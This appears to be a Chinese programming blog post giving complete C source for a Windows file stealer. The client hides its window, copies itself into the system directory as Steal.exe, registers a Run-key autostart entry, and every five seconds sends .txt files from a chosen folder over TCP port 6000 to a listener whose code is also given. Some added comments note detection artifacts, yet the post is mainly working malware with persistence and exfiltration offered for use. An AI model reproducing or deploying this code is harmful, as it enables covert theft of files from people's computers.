Windows编程
窃取对方自定义目录下的文件
加入注册表+自动隐藏自身
我这里是如图所示的目录
被窃取端的 C:\Binggo 目录下有一个 123.txt 文件,内容随意。
程序每隔 5 秒重新扫描一次该目录,所以之后新建的 1212.txt 也会被发送出去。
完整代码如下,大佬勿喷
被窃取端代码(客户端,运行在被窃取的主机上):
#include<stdio.h>
#include<windows.h>
#include<io.h>
#pragma comment(lib, "ws2_32.lib")
// Reads the beginning of the file at `path` and sends it over a new TCP
// connection to the hard-coded endpoint 127.0.0.1:6000.
//
// path: file to read (opened in binary mode).
// Returns 0 on success and -1 on a version, connect or send failure. Note that
// a WSAStartup failure also returns 0.
//
// What actually leaves the host, for anyone analysing this sample:
//  - at most the first 1024 bytes of the file are read;
//  - the send length comes from strlen(), so transmission stops at the first
//    NUL byte in the buffer;
//  - the payload is sent as-is over plain TCP, with no encryption or framing,
//    so it is fully visible to network inspection on port 6000.
// Every call performs its own WSAStartup/connect/close cycle, i.e. one
// short-lived connection per file.
int SendtoServer(const char* path)
{
// Initialize the network library
WORD wVersionRequested;
WSADATA wsaData;
int err;
char sendBuf[1024] = { 0 };
wVersionRequested = MAKEWORD(2, 2);
// Initialize Winsock, requesting version 2.2
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
printf("WSAStartup errNum=%d\n", GetLastError());
// this failure path returns 0, the same value as the success path
return 0;
}
// Confirm that the loaded Winsock really is version 2.2
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
{
printf("LOBYTE errorNum= %d\n", GetLastError());
WSACleanup();
return-1;
}
// Create the TCP socket (the author's "install the telephone" analogy; press F1 on a function for its help page)
SOCKET sockCli = socket(AF_INET, SOCK_STREAM, 0);
// Configure the server to connect to
SOCKADDR_IN addrSrv;
addrSrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");//server IPv4 address (loopback in this sample)
addrSrv.sin_family = AF_INET;//address family
addrSrv.sin_port = htons(6000);//port, converted to network byte order
// Connect to the server
if (SOCKET_ERROR == connect(sockCli, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
{
printf("connect errNum= %d\n", GetLastError());
return -1;
}
// Read the file content: a single read of up to 1024 bytes; len is not used afterwards
FILE* fp = fopen(path, "rb");
int len = fread(sendBuf,1,1024,fp);
fclose(fp);
//char recvBuf[100] = { 0 };
//int iLen = recv(sockCli, recvBuf, 100, 0);
//printf("recvBuf=%s\n", recvBuf);
//char sendBuf[100] = "ni hao";
// Send the data; the length is taken from strlen(), not from the number of bytes read
int iLen = send(sockCli, sendBuf, strlen(sendBuf)+1, 0);
if (iLen < 0)
{
printf("send error=%d\n", GetLastError());
return -1;
}
closesocket(sockCli);
WSACleanup();
return 0;
}
// Enumerates the directory `szPath` and passes every entry whose full path
// contains ".txt" to SendtoServer().
//
// szPath: directory to scan. The file name is appended to it directly, so it
//         is expected to end with a backslash (main passes "C:\\Binggo\\").
// Always returns 0; the result of SendtoServer() is ignored.
//
// Observable behaviour for defenders: each call is one full directory
// enumeration followed by one outbound connection per matching file, and the
// caller repeats it on a timer, so unchanged files are re-sent on every pass.
// No FindClose() call appears in this function, so the search handle from
// FindFirstFile stays open after each call.
int DoSteal(const char *szPath)
{
WIN32_FIND_DATA FindFileData;//receives the data of each directory entry found
HANDLE hListFile;//search handle returned by FindFirstFile
char szFilePath[MAX_PATH] = { 0 };
// Build the search pattern: <szPath>\*
strcpy(szFilePath, szPath);
strcat(szFilePath, "\\*");
// Find the first entry
hListFile=FindFirstFile(szFilePath, &FindFileData);
do
{
// Full path of the current entry: <szPath><file name>
char mypath[MAX_PATH] = {0};
strcpy(mypath, szPath);
strcat(mypath, FindFileData.cFileName);
// Substring match anywhere in the path, not a strict extension check
if (strstr(mypath, ".txt"))
{
SendtoServer(mypath);
}
printf("mypath = %s\n", mypath);
} while (FindNextFile(hListFile, &FindFileData));
return 0;
}
// Installs the running executable for automatic start:
//  1. builds the target path <system directory>\Steal.exe;
//  2. returns immediately if that file already exists (treated as installed);
//  3. shows a Yes/No/Cancel warning box: Cancel exits the process, No returns
//     without installing, Yes continues;
//  4. copies the current executable to the target path;
//  5. writes the target path as value "Steal" under
//     HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
// Every failure simply returns; nothing is reported to the caller.
//
// Artifacts for detection and clean-up, all taken from the code below: a file
// named Steal.exe in the system directory and a Run-key value named "Steal".
// Both locations normally require administrative rights to write, so for a
// standard user the copy is expected to fail and the function returns early.
// The value is written with a fixed data size of MAX_PATH bytes rather than
// the length of the path string.
void AddToSystem()
{
HKEY hKEY;
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0;
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type = REG_SZ;
DWORD size = MAX_PATH;
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// System directory and the full path of the running executable
GetSystemDirectory(SysPath, size);
GetModuleFileName(NULL,CurrentPath,size);
FileCurrentName = CurrentPath;
// lstrcat appends in place, so FileNewName points at SysPath
FileNewName = lstrcat(SysPath,"\\Steal.exe");
struct _finddata_t Steal;
printf("retl = %d,FileNewName=%s\n",ret,FileNewName);
// Target already present: nothing to do
if (_findfirst(FileNewName, &Steal) != -1)
{
return;
}
printf("ret2 = %d\n",ret);
// The only user-visible prompt: a warning box with Yes / No / Cancel
int ihow = MessageBox(0, "该程序只允许用于合法的用途", "警告", MB_YESNOCANCEL | MB_ICONWARNING | MB_TOPMOST);
if (ihow == IDCANCEL)
{
exit(0);
}
if (ihow == IDNO)
{
return;//No: skip installation, so the program only runs this one time
}
// Copy the executable; the third argument TRUE makes the copy fail if the target exists
ret = CopyFile(FileCurrentName, FileNewName, TRUE);
if (!ret)
{
return;
}
// Add the Run-key entry
printf("ret = %d\n",ret);
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
if (ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
ret = RegSetValueEx(hKEY,"Steal",NULL,type,(const unsigned char*)FileNewName,size);
if (ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
// Hides the window that currently has the foreground.
// GetForegroundWindow() returns whichever window the user is working in, so
// this is the program's own console only if that console is in front at the
// moment of the call. Only the window is hidden: the process itself stays
// visible in process listings.
void HideMyself()
{
HWND hwnd = GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
}
// Entry point of the client: hides the foreground window, attempts the
// autostart installation, then rescans C:\Binggo\ every 5000 ms forever.
// The loop never exits, so the system("pause") and return below are unreachable.
int main()
{
printf("Steal\n");
// Hide the window
HideMyself();
// Add to the startup entries
AddToSystem();
// Scan and send, repeated on a 5-second timer
while (true)
{
DoSteal("C:\\Binggo\\");//note the trailing "\\"; the directory is chosen by the author
Sleep(5000);
}
system("pause");
return 0;
}
窃取端代码(服务端,监听 6000 端口并接收数据):
#include <stdio.h>
#include<windows.h>
#pragma comment(lib, "ws2_32.lib")
#define MAX_SIZE 1024
// Writes msg and a trailing newline to stderr, then ends the process with exit status 1.
void ErrorHanding(const char*msg)
{
    fprintf(stderr, "%s\n", msg);
    exit(1);
}
// Entry point of the receiving side: a single-threaded TCP listener on
// 0.0.0.0:6000 that prints whatever each client sends.
//
// Connections are handled one at a time. There is no authentication or
// filtering of peers, so any host that can reach port 6000 can make this
// process print data. Received bytes are printed with "%s" straight from the
// receive buffer, which is zeroed once per connection, not once per recv().
// The accept loop never exits, so the cleanup code after it is unreachable.
int main()
{
// Initialize the network library
WORD wVersionRequested; //unsigned short
WSADATA wsaData;
int err;
char msg[MAX_SIZE] = {0};
wVersionRequested = MAKEWORD(2, 2);//combine two bytes into one WORD
// Initialize Winsock, requesting version 2.2
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
ErrorHanding("WSAStartup err");
}
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
{
printf("LOBYTE errorNum= %d\n", GetLastError());
WSACleanup();
// ErrorHanding() calls exit(1), so the return below is never reached
ErrorHanding("LOBYTE error");
return-1;
}
SOCKET hServerSock = socket(PF_INET, SOCK_STREAM, 0);
if (INVALID_SOCKET == hServerSock)//INVALID_SOCKET is (SOCKET)(~0), not 0
{
ErrorHanding("socket err");
}
SOCKADDR_IN addrSrv;//address structure
addrSrv.sin_addr.S_un.S_addr = htonl(INADDR_ANY);//0.0.0.0: listen on every local interface
addrSrv.sin_family = AF_INET;//address family
addrSrv.sin_port = htons(6000);//port, converted to network byte order
if (SOCKET_ERROR == bind(hServerSock, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
{
ErrorHanding("sock error");
}
// Start listening with a backlog of 5
if (SOCKET_ERROR == listen(hServerSock, 5))
{
ErrorHanding("listen error");
}
SOCKADDR_IN addrCli;
int cliAdrSize = sizeof(SOCKADDR_IN);
SOCKET cliSock;
int strLen = 0;
while(TRUE)
{
// Block until a client connects
cliSock = accept(hServerSock, (SOCKADDR*)&addrCli, &cliAdrSize);
if (SOCKET_ERROR == cliSock)
{
ErrorHanding("accept error");
}
memset(msg,0,MAX_SIZE);
// Keep reading until recv() returns 0; any other return value continues the loop
while ((strLen= recv(cliSock,msg,MAX_SIZE,0))!=0)
{
printf("Server msg=%s\n",msg);
}
closesocket(cliSock);
}
closesocket(hServerSock);
WSACleanup();
system("pause");
return 0;
}